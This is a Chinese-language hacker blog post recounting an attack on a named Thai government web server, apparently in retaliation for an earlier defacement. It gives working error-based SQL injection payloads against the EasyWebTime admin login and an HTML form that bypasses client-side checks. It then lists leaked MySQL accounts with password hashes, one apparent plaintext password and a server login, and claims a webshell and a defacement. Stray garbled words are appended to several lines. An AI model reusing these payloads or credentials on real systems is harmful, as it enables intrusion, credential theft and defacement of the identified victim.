看了一個泰國政府的網站被伊朗的黑客掛頁,上面寫着
「Your Box 0wn3z By Behrooz_Ice – Q7x -Sha2ow -Virangar -Ali_Eagle -iman_taktaz – Satanic2000」
「We Love Iran」
「Ashiyane Digital Security Team」
這樣的話云云。一些中國的傻逼還拿着別人的黑頁去zone-h去提交,感受受不了這麼傻逼的事情,就跟着犯了傻逼,捅了人家的PP
下面我就講講怎麼捅了他們的PP(http://203.154.183.18/ash_hack.htm)
做者:YoCo Smart
來自:Silic Group Hacker Armyphp
http://blackbap.orghtml
網站服務器ip爲:203.154.183.18上面一共有大約一百多個xx.cad.go.th(泰國政府域名後綴)的網站
包括主域名:www.cad.go.th(www.cad.go.th/webadmin/)
我先是看了看上面站的構架,基本上都是一個模板出來的,彷佛有點腳本問題,不過不從這邊下手。直接訪問ip能夠看到一個管理後臺mysql
看了看這個後臺,上面寫着EasyWebTime 8.6,不知道是什麼東西。而後我就用
用戶名:admin’or 1=1# 密碼任意123456登錄,獲得以下回顯:git
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 」 at line 1
關鍵的地方不是這個INSERT INTO這個錯誤,關鍵是web
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 」 at line 1
複製代碼sql
這個地方,說明後臺有POST注入,並且有數據庫錯誤回顯。
這樣的話,構建一個SQL注入的POST語句便可,經過錯誤回顯來注入出想要的信息。shell
錯誤回顯注入很簡單,套公式就好了
用戶名填寫:數據庫
- admin’ union select 1 from (select count(*),concat(floor(rand(0)*2),(select user() limit 0,1))a from information_schema.tables group by a)b#
複製代碼windows
密碼任意,點擊登錄,提示用戶名錯誤安全
估計是Javascript在做怪,繞過這個很簡單,考慮到後面注入的簡便性,乾脆寫了一個html文檔:
- <form name=」form1″ method=」post」 action=」http://203.154.183.18/login.php」>
- <textarea rows=」5″ style=」font-family:Times New Roman;font-size:14pt;」 cols=」80″ name=」EWT_User」>admin’ union select 1 from (select count(*),concat(floor(rand(0)*2),(select user() from mysql.user limit 0,1))a from information_schema.tables group by a)b#</textarea>
- <input name=」EWT_Password」 type=」password」 id=」EWT_Password」 size=」22″ value=」xxxx」 />
- <input name=」Submit」 type=」submit」 value=」Login」 />
- <input name=」Flag」 type=」hidden」 id=」Flag」 value=」Login」 />
- <input name=」password_hidden」 type=」password」 style=」display:none」 value=」Welcome」 size=」10″ />
- <input name=」password_hidden」 type=」password」 style=」display:none」 value=」Welcome」 size=」10″ />
- <input name=」password_hidden」 type=」password」 style=」display:none」 value=」Welcome」 size=」10″ />
- </form>
複製代碼
其實很簡單,line 1裏面的method表示提交方法爲POST,後面的action爲提交到的地址,這是從登錄頁面上面直接扒下來的,可是action這個地址是完整的url地址。再日後面的就比較簡單看了,保存爲xx.html而後訪問,在第一個文本框中輸入注入語句便可。
注入語句是這樣的:
- admin’ union select 1 from (select count(*),concat(floor(rand(0)*2),(select user() from mysql.user limit 0,1))a from information_schema.tables group by a)b#
複製代碼
因而獲得了回顯以下:
Duplicate entry ’1bizpoten@203.154.183.18′ for key 1
後面的Duplicate entry ’1bizpoten@203.154.183.18′ for key 1就是想要的注入結果(去掉前面的固定數字’1′)
注入語句中的
- select user() from mysql.user limit 0,1
複製代碼
換成想要的注入語句便可,例如:
- select user from mysql.user where host=’%’ limit 0,1
複製代碼
由於每次注入獲得的信息只有一條,因此比較吃力
可是最後我注入總結的信息以下:
mysql帳戶:
用戶名: 密碼哈希
kk *8B9BA157688A49AFBE7513677DCD4F7C43257018 %
bizpoten *7F6E575FAD18674CADD3B8495C79FBA5B58090D1//!2QwAsZx %
webboard *51E610BE77CF0F81D2861AF180B496D1CA2A7637 localhost
root 密碼空 127.0.0.1
數據庫中得數據表段:
- admin’ union select 1 from (select count(*),concat(floor(rand(0)*2),(select table_name from information_schema.tables where table_schema=database() limit 0,1))a from information_schema.tables group by a)b#
複製代碼
大概有70多個,中間跳着過去的,沒把表全列出來,具體我忘了,最後面的user_info引發了個人注意:
amphur,article_list,block,block_text,blog_category,blog_comment,org_type,user_info
最後獲得服務器的203.154.183.18的登陸名和密碼爲:template/template
取到webshell也就不難了
固然,服務器是windows,裝了卡巴斯基,國內的360根本就不是和卡巴斯基一個檔次的,提權頗費周折。。。不過。。。菊花聊天室已經掛上了
http://www.cad.go.th/webadmin/